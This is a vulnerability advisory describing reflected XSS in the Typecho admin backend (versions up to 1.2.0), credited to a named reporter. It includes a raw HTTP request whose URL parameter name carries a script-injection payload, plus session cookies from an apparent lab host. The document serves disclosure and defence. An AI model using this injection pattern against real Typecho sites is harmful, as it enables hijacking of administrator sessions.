Description
Typecho admin backend management system with reflected-XSS in the name of an arbitrarily supplied URL parameter.
Affected Version
Typecho <= 1.2.0
/1.png)
POC
- Login to typecho admin backend management system, in
/admin/index.php, admin/themes.php or /admin/backup.php.
- In the name of an arbitrarily supplied URL parameter, no matter key or value, will be injected to a html href attribute of
<a> tag.
1
2
3
4
5
6
7
8
9
10
11
12
| GET /typecho/admin/?"><script>alert(1)</script><!--bbb=1 HTTP/1.1
Host: 192.168.0.10
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.0.10/typecho/admin/login.php?referer=http%3A%2F%2F192.168.0.10%2Ftypecho%2Fadmin%2Findex.php%3Fr7ptu%2522%253E%253Cscript%253Ealert%281%29%253C%2Fscript%253Eat2f7%3D1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: e4dff44224c23efabc177d44e50b1de4__typecho_uid=1; e4dff44224c23efabc177d44e50b1de4__typecho_authCode=%24T%248O0qulQf98a49e06253d4ae8c93f478424457be4b; PHPSESSID=m7h7isuus6cugk6mb58vdah296
Connection: close
|
in /admin/index.php:
/2.png)
/3.png)
in /admin/theme.php:
/5.png)
/6.png)
/4.png)
in /admin/backup.php:
/8.png)
/9.png)
/7.png)
Reference
Reported by Srpopty, vulnerability discovered by using Corax.